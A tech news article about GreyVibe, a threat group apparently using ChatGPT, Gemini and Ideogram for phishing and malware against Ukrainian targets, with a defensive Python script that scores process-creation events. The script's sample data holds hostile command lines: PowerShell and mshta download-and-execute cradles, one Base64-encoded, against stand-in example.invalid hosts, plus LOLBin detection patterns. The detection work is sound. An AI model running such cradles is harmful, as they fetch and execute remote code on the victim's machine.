Russian Hackers Use ChatGPT and Gemini to Build Malware

Key Takeaways

- GreyVibe has run a 10-month cyberespionage campaign targeting Ukrainian organizations using AI-generated content and malware
- The group uses ChatGPT, Gemini, and Ideogram AI to create phishing lures, fake websites, and custom hacking tools
- AI-generated code leaves detectable patterns that security researchers can use to track threat actors

AI as a Force Multiplier for Cyberespionage
A threat group with likely ties to Russia has turned commercial AI tools into weapons. The group, tracked as GreyVibe by cybersecurity firm WithSecure, has been using ChatGPT, Google Gemini, and image generator Ideogram AI to power a cyberespionage campaign against Ukrainian targets since at least August 2025.
WithSecure discovered the activity in January 2026. The researchers found that GreyVibe uses AI not just for writing phishing emails, but for building custom malware, creating realistic fake websites, and generating visual content that makes their lures more convincing.
“The use of AI is clearly lowering the barrier to entry, enabling actors with low-to-moderate technical skill to execute persistent and complex cyberespionage campaigns at scale.”
— WithSecure Research Team
The link to Russian-speaking operators rests on several technical indicators: the malware control panels are written in Russian, so are the code comments, and the command-and-control servers are set to Moscow time (UTC+3). WithSecure stopped short of calling it a nation-state operation, but noted that the campaign aligns with Russian state interests.
Five Attack Chains, One Playbook
GreyVibe runs multiple attack campaigns simultaneously, each with a distinct approach. WithSecure identified five primary attack chains:
- PhantomMail: Spear-phishing emails with malicious ZIP or RAR files delivered through Google Drive and 4sync links. The emails impersonate Ukrainian government, emergency services, telecom, and energy organizations.
- PhantomClick: Fake CAPTCHA pages disguised as Zoom and LAPAS sites. A fake Cloudflare verification prompt instructs victims to run a command on their own machine, and that command performs the infection.
- PrincessClub: Fake Ukrainian adult and dating websites that deliver Android spyware (FallSpy) and Windows malware (PhantomRelay, LegionRelay). The operators created fake female Telegram personas and later added WebRTC video calls to capture victims' audio and video.
- DroneLink: Fake Ukrainian military charity websites themed around FPV drones and UAVs. These share infrastructure with the PrincessClub campaigns.
- Nebo: Fake Russian military communications login pages designed to trick Ukrainian military personnel into thinking they're accessing a Russian military terminal.

AI-Built Malware and Obfuscation Tools
The AI assistance goes beyond content creation. WithSecure found that GreyVibe likely used large language models to develop several custom tools. These include LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, all obfuscation tools designed to hide malicious code from security software.
The group's primary weapon is LegionRelay, a PowerShell-based remote access trojan that WithSecure believes was built with AI assistance. LegionRelay can steal files, capture screenshots, grab browser credentials, extract data from Telegram and WhatsApp, and set up remote desktop access for the attackers.
A second RAT called PhantomRelay handles system fingerprinting and dynamic script loading. Both tools give GreyVibe persistent access to compromised systems.
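The PhantomClick chain above (a user talked into running a command by a fake verification prompt) and the PowerShell-based RATs and obfuscators described in this section leave similar traces in process-creation telemetry: a scripting host started from the user's shell, a download cradle, an encoded or hidden command. The triage script below is an added example for this article, not code from WithSecure or from the GreyVibe tooling. The event records, the example.invalid URLs, the scoring weights and the verdict thresholds are all constructed for illustration; a real deployment would tune them against its own baseline.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath
from typing import Optional


def encode_powershell_command(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation records in the shape a parsed Sysmon Event ID 1 or
# EDR feed would yield. Sample data for this example, not GreyVibe telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # ClickFix-style: the user pastes a "verification" command into Win+R,
    # so explorer.exe (the shell) shows up as the parent of the script host.
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -w hidden -ep bypass -c "irm https://example.invalid/verify.txt | iex"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/captcha.hta"},
    # Encoded second stage launched from a script: the cradle is only visible after decoding.
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell -NoP -NonI -W Hidden -Enc " + encode_powershell_command(
         "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')")},
    # Benign scheduled maintenance task.
    {"parent": r"C:\Program Files\Vendor\backup.exe", "image": PS,
     "cmdline": r"powershell -File C:\Scripts\rotate-logs.ps1"},
    # A user opening a console from the Start menu: interesting parent, no payload.
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
]

# Script hosts and LOLBins commonly abused by paste-and-run lures and PowerShell tooling.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "certutil.exe", "bitsadmin.exe", "curl.exe"}
USER_LAUNCHERS = {"explorer.exe"}  # Run dialog and Start menu launches have the shell as parent

DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile"
    r"|start-bitstransfer|net\.webclient|https?://)")
INLINE_EXEC = re.compile(r"(?i)\b(iex|invoke-expression)\b")
STEALTH_FLAGS = re.compile(
    r"(?i)-w(indowstyle)?\s+hidden|-e(xecution)?p(olicy)?\s+bypass|-nop(rofile)?\b|-noni(nteractive)?\b")
ENCODED_ARG = re.compile(r"(?i)-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if absent or not valid Base64/UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    verdict: str
    score: int
    tags: list = field(default_factory=list)
    decoded: Optional[str] = None


def triage(event: dict) -> Finding:
    """Score one process-creation event; weights and thresholds are illustrative assumptions."""
    image = PureWindowsPath(event["image"]).name.lower()
    parent = PureWindowsPath(event["parent"]).name.lower()
    decoded = decode_encoded_command(event["cmdline"])
    # Match the cradle patterns against the decoded payload as well as the raw command line,
    # otherwise a Base64 wrapper hides every other indicator.
    effective = event["cmdline"] + ("\n" + decoded if decoded else "")
    tags, score = [], 0
    if image in LOLBINS and parent in USER_LAUNCHERS:
        tags.append("user_launched_lolbin"); score += 2
    if decoded is not None:
        tags.append("encoded_command"); score += 2
    if DOWNLOAD_CRADLE.search(effective):
        tags.append("download_cradle"); score += 2
    if INLINE_EXEC.search(effective):
        tags.append("inline_execution"); score += 1
    if STEALTH_FLAGS.search(effective):
        tags.append("stealth_flags"); score += 1
    verdict = "alert" if score >= 4 else "review" if score >= 2 else "benign"
    return Finding(verdict, score, tags, decoded)


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        f = triage(ev)
        print(f"{f.verdict:7} score={f.score} tags={f.tags}")
        if f.decoded:
            print("        decoded:", f.decoded)
```

The two ClickFix-style records and the encoded cradle all reach "alert", the maintenance task stays "benign", and a console opened from the Start menu lands in "review" because the parent is suspicious on its own but carries no payload. The decode step matters most: without it the third record would show nothing but a hidden window flag.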

AI Leaves a Trail
Here's the twist. The same AI tools that make GreyVibe more productive also make them easier to track. Security researchers identified distinct patterns in AI-generated code and images that function like a digital fingerprint.
Discussion on Reddit's r/cybersecurity and Hacker News has focused on these "AI-native" error patterns. Multiple security professionals noted that while AI speeds up attack development, the structural quirks in AI-generated content give defenders new ways to identify automated attacks.
WithSecure tracked GreyVibe for nearly a year by exploiting these patterns. The group's heavy reliance on AI-generated infrastructure created unique flaws that researchers could follow across campaigns.
Logicity's Take
What Organizations Should Watch For
GreyVibe's tactics offer a preview of what AI-enhanced attacks look like in practice. The quality of their phishing content is notably high. Emails and websites look professional. The decoy documents are convincing. The fake CAPTCHA pages could fool trained users.
Organizations connected to Ukraine or Ukrainian interests should treat this as an active threat. But the techniques GreyVibe uses will spread. Other groups will adopt similar AI-assisted methods. Security teams everywhere should prepare for phishing campaigns that look more polished and vary more rapidly than traditional attacks.
Frequently Asked Questions
What is GreyVibe?
GreyVibe is a likely Russian threat group discovered by WithSecure that uses AI tools like ChatGPT and Gemini to conduct cyberespionage against Ukrainian organizations. The group has been active since at least August 2025.
How do hackers use ChatGPT for cyberattacks?
GreyVibe uses ChatGPT and similar AI tools to write convincing phishing emails, create fake websites, generate realistic visual content, and develop custom malware and code obfuscation tools.
Can AI-generated malware be detected?
Yes. AI-generated code and content often contain distinctive patterns or structural quirks that security researchers can identify. WithSecure tracked GreyVibe for nearly a year by exploiting these AI fingerprints.
Who is being targeted by GreyVibe?
GreyVibe primarily targets Ukrainian or Ukraine-related organizations across military, government, civilian, and business sectors. Their phishing campaigns impersonate Ukrainian government agencies, energy companies, and telecom providers.
What malware does GreyVibe use?
The group uses several custom tools including LegionRelay and PhantomRelay (PowerShell RATs), FallSpy (Android spyware), and multiple code obfuscators (LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP).
Source: BleepingComputer
Manaal Khan
Tech & Innovation Writer